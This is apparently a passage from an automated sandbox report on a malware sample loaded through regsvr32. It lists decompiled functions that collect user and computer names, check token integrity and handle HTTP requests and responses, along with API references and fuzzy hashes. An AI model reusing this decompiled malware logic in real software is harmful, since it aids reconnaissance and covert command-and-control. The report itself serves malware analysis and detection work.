                                0x02bd7a7e
                                0x02bd7a82
                                0x02bd7a91
                                0x02bd7a98
                                0x02bd7a9f
                                0x02bd7a9f
                                0x02bd7aaa
                                0x02bd7aaa
                                0x02bd7a82
                                0x02bd7a70
                                0x02bd7ac1
                                0x02bd7ac7
                                0x02bd7ad1
                                0x02bd7ad3
                                0x02bd7ad8
                                0x02bd7ae7
                                0x02bd7aeb
                                0x02bd7af6
                                0x02bd7afd
                                0x02bd7b04
                                0x02bd7b04
                                0x02bd7b10
                                0x02bd7b10
                                0x02bd7aeb
                                0x02bd7b1b
                                0x02bd7b1d
                                0x02bd7b20
                                0x02bd7b22
                                0x02bd7b25
                                0x02bd7b28
                                0x02bd7b32
                                0x02bd7b36
                                0x02bd7b3a

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 02BD7A65
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 02BD7A7C
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 02BD7A89
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02BD30EE), ref: 02BD7AAA
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BD7AD1
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02BD7AE5
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BD7AF2
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02BD30EE), ref: 02BD7B10
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID: Ut
                                • API String ID: 3239747167-8415677
                                • Opcode ID: ff9632fe5bd2189e5b4d79a2ba5ec570219680c8e8d0120c4263a6d2c676a793
                                • Instruction ID: 6be02d13c09186f24a1c267b929c74e2ed0e37b345838a270fa1b8a023987246
                                • Opcode Fuzzy Hash: ff9632fe5bd2189e5b4d79a2ba5ec570219680c8e8d0120c4263a6d2c676a793
                                • Instruction Fuzzy Hash: C2311772A40206AFDB10DFA9CD90BEEFBF9EB48244B654869E545D7210FB30EA119B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD8E0D, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E02BD8E0D(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02BDAF68();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2bdd2a8; // 0x242a5a8
				_t5 = _t13 + 0x2bde87e; // 0x5008e26
				_t6 = _t13 + 0x2bde59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02BDAC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x2bdd2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                0x02bd8e0d
                                0x02bd8e15
                                0x02bd8e19
                                0x02bd8e1f
                                0x02bd8e24
                                0x02bd8e29
                                0x02bd8e2c
                                0x02bd8e2f
                                0x02bd8e34
                                0x02bd8e35
                                0x02bd8e38
                                0x02bd8e3d
                                0x02bd8e44
                                0x02bd8e4e
                                0x02bd8e50
                                0x02bd8e51
                                0x02bd8e54
                                0x02bd8e70
                                0x02bd8e76
                                0x02bd8e7a
                                0x02bd8ec8
                                0x02bd8e7c
                                0x02bd8e89
                                0x02bd8e99
                                0x02bd8ea1
                                0x02bd8eb3
                                0x02bd8eb7
                                0x00000000
                                0x00000000
                                0x02bd8ea3
                                0x02bd8ea6
                                0x02bd8eab
                                0x02bd8ead
                                0x02bd8ead
                                0x02bd8e8b
                                0x02bd8e8d
                                0x02bd8eb9
                                0x02bd8eba
                                0x02bd8eba
                                0x02bd8e89
                                0x02bd8ecf

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02BD2FFF,?,?,4D283A53,?,?), ref: 02BD8E19
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02BD8E2F
                                • _snwprintf.NTDLL ref: 02BD8E54
                                • CreateFileMappingW.KERNELBASE(000000FF,02BDD2AC,00000004,00000000,00001000,?), ref: 02BD8E70
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BD2FFF,?,?,4D283A53), ref: 02BD8E82
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 02BD8E99
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BD2FFF,?,?), ref: 02BD8EBA
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BD2FFF,?,?,4D283A53), ref: 02BD8EC2
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: f22bc7b43f7270a76c6e168377b181896fb44b9f405cc59707606fb241693146
                                • Instruction ID: bd394631169f4a6cfe236410f4a5e8dbcad0ae18ee972bf8ce41908d6078ff58
                                • Opcode Fuzzy Hash: f22bc7b43f7270a76c6e168377b181896fb44b9f405cc59707606fb241693146
                                • Instruction Fuzzy Hash: 2621D2B6A81204BBD711AF64CC05FDE7BA9EB44751F150561F605E71D0FB70D905CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD58DB, Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E02BD58DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E02BD29C0(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E02BD8B22(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E02BD8B22(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E02BD8B22(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E02BD8B22(_t46);
				}
				return _t24;
			}












                                0x02bd58db
                                0x02bd58db
                                0x02bd58dd
                                0x02bd58df
                                0x02bd58e6
                                0x02bd58ed
                                0x02bd58ed
                                0x02bd58f2
                                0x02bd58f5
                                0x02bd58fc
                                0x02bd5905
                                0x02bd5909
                                0x02bd590e
                                0x02bd590e
                                0x02bd5910
                                0x02bd5915
                                0x02bd5919
                                0x02bd591e
                                0x02bd591e
                                0x02bd5920
                                0x02bd5925
                                0x02bd5929
                                0x02bd592e
                                0x02bd592e
                                0x02bd5930
                                0x02bd593b
                                0x02bd593e
                                0x02bd593e
                                0x02bd5940
                                0x02bd5945
                                0x02bd5948
                                0x02bd5948
                                0x02bd594a
                                0x02bd5951
                                0x02bd5954
                                0x02bd5959
                                0x02bd595c
                                0x02bd595c
                                0x02bd595f
                                0x02bd5964
                                0x02bd5967
                                0x02bd5967
                                0x02bd596c
                                0x02bd5970
                                0x02bd5973
                                0x02bd5973
                                0x02bd5978
                                0x02bd597d
                                0x00000000
                                0x02bd5980
                                0x02bd5987

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 02BD5909
                                • InternetCloseHandle.WININET(?), ref: 02BD590E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 02BD5919
                                • InternetCloseHandle.WININET(?), ref: 02BD591E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 02BD5929
                                • InternetCloseHandle.WININET(?), ref: 02BD592E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02BD93DC,?,?,00000000,00000000,74E481D0), ref: 02BD593E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02BD93DC,?,?,00000000,00000000,74E481D0), ref: 02BD5948
                                  • Part of subcall function 02BD29C0: WaitForMultipleObjects.KERNEL32(00000002,02BDA923,00000000,02BDA923,?,?,?,02BDA923,0000EA60), ref: 02BD29DB
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                                • String ID:
                                • API String ID: 2824497044-0
                                • Opcode ID: e92c0e0b5c3a816de3c8fee18824098aa3bbbf5042da20aed8122ac58dae586b
                                • Instruction ID: fe5a323678210d68bd1bacd22b58aa277f4a0e453a1fba4fcb3eff37ce17ae49
                                • Opcode Fuzzy Hash: e92c0e0b5c3a816de3c8fee18824098aa3bbbf5042da20aed8122ac58dae586b
                                • Instruction Fuzzy Hash: 59115E766006486BC630AFAAEC84C9BF7EEFF482253D50D59E186D3510E735F8498B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BDA2C6, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 100%
                                			E02BDA2C6(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2bdd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02BD1525(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02BD8B22(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                0x02bda2d3
                                0x02bda2da
                                0x02bda2e1
                                0x02bda2f5
                                0x02bda300
                                0x02bda318
                                0x02bda325
                                0x02bda328
                                0x02bda32d
                                0x02bda338
                                0x02bda33c
                                0x02bda34b
                                0x02bda34f
                                0x02bda36b
                                0x02bda36b
                                0x02bda36f
                                0x02bda36f
                                0x02bda374
                                0x02bda378
                                0x02bda37e
                                0x02bda37f
                                0x02bda386
                                0x02bda38c

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02BDA2F8
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02BDA318
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02BDA328
                                • CloseHandle.KERNEL32(00000000), ref: 02BDA378
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02BDA34B
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02BDA353
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02BDA363
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 6c1697077528abc7ba74cc5e6d3439ca01217fe93e799e0343ea07860b34aba2
                                • Instruction ID: 258d03f5f1c81df32ca04171c33863d7c03cc6c9da673d77b792d6bd06c5bd1e
                                • Opcode Fuzzy Hash: 6c1697077528abc7ba74cc5e6d3439ca01217fe93e799e0343ea07860b34aba2
                                • Instruction Fuzzy Hash: 96213975D40209FFEB009FA4DC44EEEBBBAEB48354F1040A5E550E7250E7719A55EF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD5988, Relevance: 9.1, APIs: 6, Instructions: 124filenetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 223 2bd5988-2bd598f 224 2bd599a-2bda574 ResetEvent InternetReadFile 223->224 225 2bd5991-2bd5998 call 2bd57dd 223->225 229 2bda5a5-2bda5aa 224->229 230 2bda576-2bda584 GetLastError 224->230 225->224 231 2bd59a2-2bd59a3 225->231 234 2bda66d 229->234 235 2bda5b0-2bda5bf 229->235 232 2bda59d-2bda59f 230->232 233 2bda586-2bda594 call 2bd29c0 230->233 232->229 237 2bda670-2bda676 232->237 233->237 242 2bda59a 233->242 234->237 240 2bda668-2bda66b 235->240 241 2bda5c5-2bda5d4 call 2bd1525 235->241 240->237 245 2bda65a-2bda65c 241->245 246 2bda5da-2bda5e2 241->246 242->232 248 2bda65d-2bda666 245->248 247 2bda5e3-2bda608 ResetEvent InternetReadFile 246->247 251 2bda60a-2bda618 GetLastError 247->251 252 2bda631-2bda636 247->252 248->237 253 2bda61a-2bda628 call 2bd29c0 251->253 254 2bda641-2bda64b call 2bd8b22 251->254 252->254 255 2bda638-2bda63f 252->255 253->254 261 2bda62a-2bda62f 253->261 254->248 260 2bda64d-2bda658 call 2bd48cb 254->260 255->247 260->248 261->252 261->254
                                C-Code - Quality: 71%
                                			E02BD5988(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				int _t34;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_t34 = InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8); // executed
					if(_t34 != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x2bdd164(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E02BD1525(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E02BD29C0( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E02BD8B22(_v16);
										if(_t64 == 0) {
											_t64 = E02BD48CB(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E02BD29C0( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E02BD57DD(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}


















                                0x02bd5988
                                0x02bd5989
                                0x02bd598f
                                0x02bd599a
                                0x02bd599a
                                0x02bd599c
                                0x02bda556
                                0x02bda55b
                                0x02bda55d
                                0x02bda56c
                                0x02bda574
                                0x02bda5a5
                                0x02bda5aa
                                0x02bda66d
                                0x02bda5b0
                                0x02bda5b7
                                0x02bda5bf
                                0x02bda66a
                                0x02bda5c5
                                0x02bda5ca
                                0x02bda5cf
                                0x02bda5d4
                                0x02bda65c
                                0x02bda5da
                                0x02bda5da
                                0x02bda5dc
                                0x02bda5e2
                                0x02bda5e3
                                0x02bda5e3
                                0x02bda5e6
                                0x02bda5e9
                                0x02bda5ef
                                0x02bda600
                                0x02bda608
                                0x00000000
                                0x00000000
                                0x02bda610
                                0x02bda618
                                0x02bda624
                                0x02bda628
                                0x02bda62a
                                0x02bda62f
                                0x00000000
                                0x00000000
                                0x02bda62f
                                0x02bda628
                                0x02bda641
                                0x02bda644
                                0x02bda64b
                                0x02bda656
                                0x02bda656
                                0x00000000
                                0x02bda631
                                0x02bda631
                                0x02bda636
                                0x02bda638
                                0x02bda639
                                0x02bda63c
                                0x00000000
                                0x02bda63c
                                0x00000000
                                0x02bda636
                                0x02bda5e3
                                0x02bda65d
                                0x02bda65d
                                0x02bda663
                                0x02bda663
                                0x02bda5bf
                                0x02bda576
                                0x02bda57c
                                0x02bda584
                                0x02bda59d
                                0x02bda59f
                                0x00000000
                                0x00000000
                                0x02bda586
                                0x02bda590
                                0x02bda594
                                0x02bda59a
                                0x00000000
                                0x02bda59a
                                0x02bda594
                                0x02bda584
                                0x02bda676
                                0x02bd5991
                                0x02bd5991
                                0x02bd5998
                                0x02bd59a3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd5998

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 02BDA55D
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 02BDA56C
                                • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 02BDA576
                                • ResetEvent.KERNEL32(?), ref: 02BDA5EF
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 02BDA600
                                • GetLastError.KERNEL32 ref: 02BDA60A
                                  • Part of subcall function 02BD57DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 02BD57F4
                                  • Part of subcall function 02BD57DD: SetEvent.KERNEL32(?), ref: 02BD5804
                                  • Part of subcall function 02BD57DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02BD5836
                                  • Part of subcall function 02BD57DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD585B
                                  • Part of subcall function 02BD57DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD587B
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: 5f3139dafac3acca1e9d721ace308241894e8c97740a93193d318d8d768675ff
                                • Instruction ID: 478f39b30cf755048b21cf9eae069d6a22f04161b8401dba8330aa396373f204
                                • Opcode Fuzzy Hash: 5f3139dafac3acca1e9d721ace308241894e8c97740a93193d318d8d768675ff
                                • Instruction Fuzzy Hash: 7641C536A00605EBCB219FA4DC44FEEB7B9EF843A4F1105A9E556D7290FB70E941CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD2789, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E02BD2789(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2bdd238 = _t10;
				if(_t10 != 0) {
					 *0x2bdd1a8 = GetTickCount();
					_t12 = E02BD9EBB(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L02BDB0CA();
							_t34 = _t14 + _t16;
							_t18 = E02BD122B(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E02BD4D4D(_t26) != 0) {
							 *0x2bdd260 = 1; // executed
						}
						_t12 = E02BD2F70(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                0x02bd2789
                                0x02bd278f
                                0x02bd2790
                                0x02bd279c
                                0x02bd27a2
                                0x02bd27a9
                                0x02bd27b9
                                0x02bd27be
                                0x02bd27c5
                                0x02bd27c7
                                0x02bd27cc
                                0x02bd27d2
                                0x02bd27d8
                                0x02bd27e2
                                0x02bd27e6
                                0x02bd27e8
                                0x02bd27ed
                                0x02bd27ee
                                0x02bd27ef
                                0x02bd27f4
                                0x02bd27fa
                                0x02bd2805
                                0x02bd2806
                                0x02bd280c
                                0x02bd2812
                                0x02bd281e
                                0x02bd2820
                                0x02bd2820
                                0x02bd282a
                                0x02bd282a
                                0x02bd27ab
                                0x02bd27ad
                                0x02bd27ad
                                0x02bd2834

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,02BD7F25,?), ref: 02BD279C
                                • GetTickCount.KERNEL32 ref: 02BD27B0
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02BD7F25,?), ref: 02BD27CC
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD27D2
                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 02BD27EF
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,02BD7F25,?), ref: 02BD280C
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                • String ID:
                                • API String ID: 507476733-0
                                • Opcode ID: 4d30af5d87b7ab4161a5412e16fc757253243e60c8bf72ed258718a3556bbf16
                                • Instruction ID: b499821f1ca6eafbf268d140cfd80bbbd15e5129888f902a8c0cb1e484970f8f
                                • Opcode Fuzzy Hash: 4d30af5d87b7ab4161a5412e16fc757253243e60c8bf72ed258718a3556bbf16
                                • Instruction Fuzzy Hash: 7F11E572E81201ABD7206BB4DC29BDA7AA9EF44394F00496AFD45C7280FB70E850CA64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD97F7, Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 279 2bd97f7-2bd9806 280 2bd9808-2bd9818 call 2bd8cfa 279->280 281 2bd981a-2bd981e call 2bda85c 279->281 280->281 286 2bd9869 GetLastError 280->286 285 2bd9823-2bd9825 281->285 287 2bd9864-2bd9867 285->287 288 2bd9827-2bd984c ResetEvent * 2 HttpSendRequestA 285->288 289 2bd986b-2bd986d 286->289 287->286 287->289 290 2bd984e-2bd9855 GetLastError 288->290 291 2bd9859-2bd985c SetEvent 288->291 290->287 292 2bd9857 290->292 293 2bd9862 291->293 292->293 293->287
                                C-Code - Quality: 100%
                                			E02BD97F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02BD8CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02BDA85C(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                0x02bd97f7
                                0x02bd9804
                                0x02bd9806
                                0x02bd9869
                                0x00000000
                                0x02bd9869
                                0x02bd981e
                                0x02bd9825
                                0x02bd9831
                                0x02bd9836
                                0x02bd984c
                                0x02bd985c
                                0x00000000
                                0x02bd984e
